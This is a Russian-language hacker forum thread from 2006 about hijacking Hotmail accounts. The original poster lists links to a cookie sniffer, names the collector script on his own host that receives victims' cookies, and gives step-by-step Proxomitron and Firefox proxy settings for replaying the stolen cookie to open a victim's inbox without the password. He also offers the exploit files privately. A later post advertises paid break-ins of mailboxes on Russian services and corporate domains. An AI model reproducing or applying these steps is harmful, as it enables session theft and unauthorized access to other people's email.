Взлом ХотМайла

Discussion in 'Уязвимости Mail-сервисов' started by Actu@l SpY, 25 Sep 2006.

  1. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    Взлом ХотМайла
    линк сниффера:
    http://devarsiv.org/picture5.jpg
    http://devarsiv.org/a.gif
    http://www.devarsiv.org/a.txt
    при нажатии на линк у жертвы уплывут куки на аддресс:
    www.devarsiv.org/alex/alex.php

    Подмена куки и вход в инбокс обходя пасс: через Mozila Firefox в настройках браузера:tools,option,connection setting,manual proxy configuration HTTP proxy вводим 127.0.0.1 port 8080 ставим у себя галочку на: use this proxy server for all protocols

    идиом дальше: качаем http://www.devarsiv.org/proxomitron.zip
    открываем подручным текстовым редактором в проксеметроне файл default.cfg находим строку:
    In = TRUE
    Out = TRUE
    Key = "cookie:hott"
    Match = "*"
    Replace = ""
    и меж кавычек в Replace = "" вставляем наши куки
    теперь в браузере Mozila Firefox вводим этот аддрecc:http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и попадаем в инбокс обходя пасс
    просьба не злоупотреблять приведённым примером
    всем удачного xака !!
     
    #1 Actu@l SpY, 25 Sep 2006
    Last edited: 26 Sep 2006
    5 people like this.
  2. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Чесно говоря ниче не понял!
    При нажатие на какой линк у жертвы уплывают куки???
    про XSS здесь ниче не написано!
    Можно чуть по поподробней про сам угон куков!
     
    #2 nc.STRIEM, 26 Sep 2006
    Last edited: 26 Sep 2006
  3. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс
     
    1 person likes this.
  4. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    нажав на линк одной из этих ссылок:
    http://devarsiv.org/picture5.jpg
    http://devarsiv.org/a.gif
    http://www.devarsiv.org/a.txt
    _____________________________________________________

    куки уплывут на адрес: www.devarsiv.org/alex/alex.php
    подменяете куки в проксометроне.
    a в браузере Mozila Firefox пройдя по этой ссылке:
    http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
    и вы в инбоксе
     
    #4 Actu@l SpY, 26 Sep 2006
    Last edited: 26 Sep 2006
  5. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    100% рабочая бага
    раньше срабатывала и на яхо, но на яхо багу недавно закрыли
     
    #5 Actu@l SpY, 26 Sep 2006
    Last edited: 26 Sep 2006
  6. [hidden]

    [hidden] Elder - Старейшина

    Joined:
    5 Nov 2005
    Messages:
    70
    Likes Received:
    19
    Reputations:
    7
    Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes

    Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить
     
  7. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    статья моя сам написал, не откуда не выдёргивал.
    объясню ещё раз, бага рабочая работает без проблем.
    эту ссылку: http://www.devarsiv.org/a.txt скиньте на хотмайл
    после нажатия на ссылку жертва попадет к себе-же в календарь
    сработает скрипт и куки уплывут на адрес: www.devarsiv.org/alex/alex.php
    далее: открываем текстовым редактором в проксометроне файл "default.cfg" находим строку
    In = TRUE
    Out = TRUE
    Key = "cookie:hott"
    Match = "*"
    Replace = ""
    и меж кавычек в Replace = " here" вставляем куки
    попaдём мы в инбокс только через Mozila Firefox
    изменим в настройках браузера:configuration HTTP proxy: на 127.0.0.1 порт 8080
    после запустим сам проскометрон он должен будет ждать соединения на 8080 порту
    в браузере Мозила где вы изменили configuration HTTP proxy на 127.0.0.1 8080 вводим: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы попaдаете в инбокс от куда угнали куки
    если не разберётесь стучите в асиу
    удачи!!
     
    #7 Actu@l SpY, 26 Sep 2006
    Last edited: 26 Sep 2006
    1 person likes this.
  8. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    сам сплойт у меня на хосте выполнит скрипт, вам нужно,
    чтоб жертва просто прошла по одной любой из этих ссылок:
    http://devarsiv.org/a.gif
    http://devarsiv.org/picture5.jpg
    http://www.devarsiv.org/a.txt
    а на этот адрес: www.devarsiv.org/alex/alex.php придут куки
     
    #8 Actu@l SpY, 26 Sep 2006
    Last edited: 29 Sep 2006
  9. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    кто хочет ломануть мыло в домен-не хотмаил может воспользоваться уже готовым приведённым выше мной вариантом
    сам сплойт и ксс на хотмайле выкладывать в паблик не буду,кто реально нуждается стучите могу скинуть все нужные файлы, для этого вам понадобится хост с поддержкой Php
     
  10. Mukis

    Mukis Elder - Старейшина

    Joined:
    27 Nov 2005
    Messages:
    47
    Likes Received:
    25
    Reputations:
    0
    Короч я понял. Фишка в следующем. Верхний вариант -- это если ты уже в корень обленился, не собрать сплоит, не залить его и т.д. Нижний вариант, я имею ввиду предложение кому надо сплоит и т.п. -- это если ты не веришь, что это должно работать:))))))))
     
  11. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    2 Mukis
    неправильно ты всё понял, приведённый мной вариант полностью готов к использованию,моя ошибка я не правильно выложил путь к инбоксу
    я исправил по этой ссылки попадаем в инбокс: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes

    сейчас сделаю видео
     
    2 people like this.
  12. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    941
    Reputations:
    355
    Actu@l SpY

    Молодец!.
     
  13. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Прочитав твой первый пост сначало ниче не понял, т.к. ты там мало че обяснил! потом посмотрел видео и врубился!Суть: использование пасивной XSS на msn и CИ )))) МОЛОДЕЦ!
     
    #13 nc.STRIEM, 26 Sep 2006
    Last edited: 26 Sep 2006
    1 person likes this.
  14. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    Минус убрал
     
  15. hackermail

    hackermail New Member

    Joined:
    5 Oct 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    взлом мыла

    Предлагаю услуги взломы почтовых ящиков, в почтовых службах @mail.ru, @bk.ru, @inbox.ru, @list.ru, @rambler.ru, @yandex.ru. А так же комерчиские взломы почтовых ящиков фирм и предприятий например @samsung.com, @lg.ru.

    Расценки:
    Взлом одного ящика: 5 wmz (при взломе нескольких ящиков возможны скидки)
    Комерческий взлом: 500 wmz
    А так же могу показать баги или мануал по взлому ящика: 200 wmz

    В качестве гарантий пресылаю скриншот со взломанного ящика, и только после оплаты по средствам WebMoney (www.webmoney.ru), присылаю вам пароль от взломанного почтового ящика.

    Обращаться по e-mail адресу: [email protected]
     
  16. Lany

    Lany New Member

    Joined:
    13 Sep 2006
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    полезная инфа, молодец.